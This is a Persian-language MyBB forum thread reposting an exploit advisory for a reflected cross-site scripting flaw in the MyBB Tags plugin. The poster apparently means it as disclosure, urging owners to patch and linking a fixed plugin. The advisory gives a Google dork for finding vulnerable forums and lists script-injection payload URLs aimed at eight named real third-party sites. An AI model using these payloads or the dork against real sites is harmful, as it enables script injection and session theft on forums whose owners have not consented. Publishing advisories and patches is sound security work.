هاست لینوکس

آخرین بسته‌ی MyBB: نسخه‌ی 1.8.27 MyBB منتشر شد


امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
Mybb Tags Plugin Cross-Site Scripting Vulnerability
#1
Thumbs Up 
با سلام و درود.
روز 13 رو با یک اکسپلویتی که اکثر سایت هایی که از mybb استفاده میکنند,حتی سایت های پشتیبانی,این باگ رو دارند.این فکر کنم قبلا ثبت شده بود.اما این روی تمامی ورژن ها و سایت های بزرگتر هم دیده شد و به ثبت رسید.
امیدوارم هرچه زودتر این باگ پتچ بشه.فایل پتچ شده را در همین تاپیک خواهیم گذاشت.
کد:
###########################

# Mybb Tags Plugin Cross-Site Scripting Vulnerability

###########################

#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#         Iranian Exploit DataBase

# Mybb Tags Plugin Cross-Site Scripting Vulnerability

# Version Tag Plugin : 1.*

# Vulnerable: 1.6.* and 1.8.*

# Vendor site : https://mods.mybb.com/view/tag-system

# Dork : "MyBB, © 2002-2016" + inurl:tags.php?tag=

# Author : IeDb.Ir

# Site : Www.IeDb.Ir   -   Www.IeDb.Ir/acc   -   xssed.Ir   -   kkli.ir

# Vulnerability attack information site : http://xssed.Ir/

#####################################

Bug :

http://www.site.com/mybb/tags.php?tag=[Xss]

Dem0 :

http://mybbskin.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.forum.woc.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.lawwiki.ir/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.andysheh.com/talar/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://stertixforum.altervista.org/tags.php?tag=mybb"><script>alert(/IeDb.Ir/)</script>
http://bmw-diag.pl/tags.php?tag=ZUSB"><script>alert(/IeDb.Ir/)</script>
http://www.englishlearner.info/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.forumszklarskaporeba.pl/tags.php?tag=T%C5%82usty%3Cinput%20onfocus=alert%281%29%20autofocus%3E

#####################################

#  Archive Exploit = http://iedb.ir/exploits-4982.html

#####################################

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-04-01]

###########################

لینک : http://iedb.ir/exploits-4982.html

خیلی از سایت های ایرانی این مشکل رو داشتن و الانم دارن.اما هنوز کسی به فکر پتچ نبودن.انشالله که پتچ کنند و سعی میکنیم به همه اطلاع رسانی کنیم که پتچ کنند.

نکته : دوتا مشکل امنیتی دیگه هم هست که با اینکه درجه اهمیت low هستش.اما باید پتچ بشه.این دوباگ دیگ هکه مکمل همین اکسپلویت هستش,باید پتچ بشه و این دوتای دیگه روی خیلی از سایت ها جواب داده و خواهد داد.انشالله فرصت کنم اون دوتارو هم خواهم گذاشت.
به خیلی ها گزارش دادم.امیدوارم که یکم کمک کنند و به فکر باشند.

ویرایش شده :
پلاگین سالم و بدون مشکل این پورتال,در لینک زیر قرار داده شد :

http://kkli.ir/kJjCt

باگ های بعدی در این سیستم هم در همون تاپیک پتچ خواهد شد و قرار داده خواهد شد.[تصویر:  13.gif]
موفق باشید

این باگ چند روز پیش پابلیک شد.اما امروز قرار داده شده اینجا.چندتا سایت زود پتچ کردند و ماهم پتچ این باگ رو داخل سایت گذاشتیم.
امیدوارم که شاهد اینطوری باگ ها نباشیم.با اینکه باگ همیشه هست.اما به حداقل برسونیم بهتره.

منبع و توضیحات تکمیلی :  تیم امنیتی Iedb.Ir
پاسخ


پیام‌های داخل این موضوع
Mybb Tags Plugin Cross-Site Scripting Vulnerability - توسط IeDb - ۱۳۹۵/۱/۱۹، ۱۸:۰۸:۱۵ عصر
RE: Mybb Tags Plugin Cross-Site Scripting Vulnerability - توسط firstboy000 - ۱۳۹۵/۱/۲۱، ۰۸:۴۶:۰۱ صبح
RE: Mybb Tags Plugin Cross-Site Scripting Vulnerability - توسط IeDb - ۱۳۹۵/۱/۲۲، ۱۰:۱۵:۲۹ صبح

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان